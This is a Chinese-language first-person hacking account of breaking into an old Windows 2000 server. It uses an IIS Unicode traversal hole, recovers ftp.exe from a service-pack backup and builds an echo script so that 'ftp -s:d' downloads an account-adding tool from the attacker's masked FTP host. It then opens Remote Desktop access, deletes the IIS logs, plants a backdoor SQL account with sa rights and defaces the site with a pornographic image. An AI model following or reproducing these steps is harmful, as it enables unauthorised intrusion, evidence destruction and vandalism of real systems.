序言

如果说黑U漏洞的站有手气背的，大概都比不上我。

第一章

找到一台破机器，看着他开了21、80、135、139、1433、3389

心想蛮好破的，本来没什么兴趣，先用sql客户端连接，sa空密码试试。。。。

居然设置了密码，这个网管的智商可能大于40，呵呵，再看看U之类的喽。。。。

扫描结果显示有U，3389登录上去发现没有输入法漏洞，faint，我还真不知道这service pack怎么能打出这副样子出来，照说打了之后应该没有U漏洞啊。。。。

随便敲个dir+c:\tftp*+/s，等了半天（这机器很烂），居然没有，估计是被尼姆达搞得不行了，才出此烂招，f\*\*!!!

为了快一点，dir+c:\winnt\system32\ftp.exe，没有！！faint!!!

连这个都删？？！！比我还变态。。。真没折了？那我的扫描记录留在那里多危险啊！！

靠，这么变态的网管，搞他没商量！！！

想了3秒种，得出了一个结论：

。。。。。。。。。。

其实FTP.exe是存在的～～，在哪里呢？

第二章

呣呣～～，他不是爱打services pack吗？凭他这么智障的网管，肯定忘记了在service pack有一个备份，微软为我们考虑得还挺周到啊，哈哈哈哈

吸取教训，直接整个硬盘查找，慢就慢点吧

dir c:\ftp.exe /s，果然在service pack下面有这个鸟文件，copy过来。。。

好了，echo open xxx.xxx.xxx.xxx >d 连接到我的ftp服务器（我不会告诉你的～～）

echo xxxxxx >>d 我的帐号，当然也不会告诉你

echo xxxxxx >>d 我的密码，你认为我会告诉你吗？

echo bin >>d 为什么？你们想想吧，反正加上不会遇到麻烦

echo get xxxxx >>d 方法太烂，不好意思告诉你，反正是可以用来加帐号的东西就行

echo bye >>d 礼貌一点，和我得FTP服务器说byebye

OK，

ftp -s:d

等着吧，一会儿功夫，报告cgi error，不管他，dir。。。。

shit !!!没有传过来，难道我的服务器....????

连接上我的服务器看看，一切正常啊，

type d ，也很正常啊，怎么回事情？

ping 目标,发现速度奇慢，我大概知道怎么回事情了！！！

改写d!!!

echo open xxxxx >d

echo asdfasdf >>d

echo adsfasdf >>d

echo user xxxxx >>d

echo xxxxx >>d

echo bin >>d

echo get xxxx >>d

echo bye >>d

OK

ftp -s:d

这次好了，原因不明

连接进去，加帐号，然后3389进去。。。。

第三章

忽然说我这个帐号无权登录，faint!!! 黑个破站怎么这么烦？？！！

改terminal services登录帐户限制

在我的机器上点击“我的电脑”－》管理－》\\xxx.xxx.xxx.xxx－》确定（谁会按取消啊，真是。。。）

等了半个世纪左右，出来了服务列表，修改terminal services“属性”，登录帐户修改为“本机上的帐户”，重新启动terminalservices 服务，退出

再从3389登录进去，TMD，总算看到win2000的桌面了。

后记

停掉WWW服务，冲到c:\winnt\system32\logfiles下删w3svc日志，

在sql server里放个帐号，当然权限了sa一致，以后不爽了还能进来逛逛。。。。。

哇哈哈，不怕警察叔叔来找我喽～～！！

顺手改掉他那难看的index.html，放个黄色图片吧，凭那位网管的智商，大概也就看得懂这些了。。。

总结：

1）如果漏洞补丁没打全，那么就不要开这个服务；

2）删除文件时要考虑到备份文件是否存在；

3）端口能少开就少开，少开一点不会死，开多了死得难看。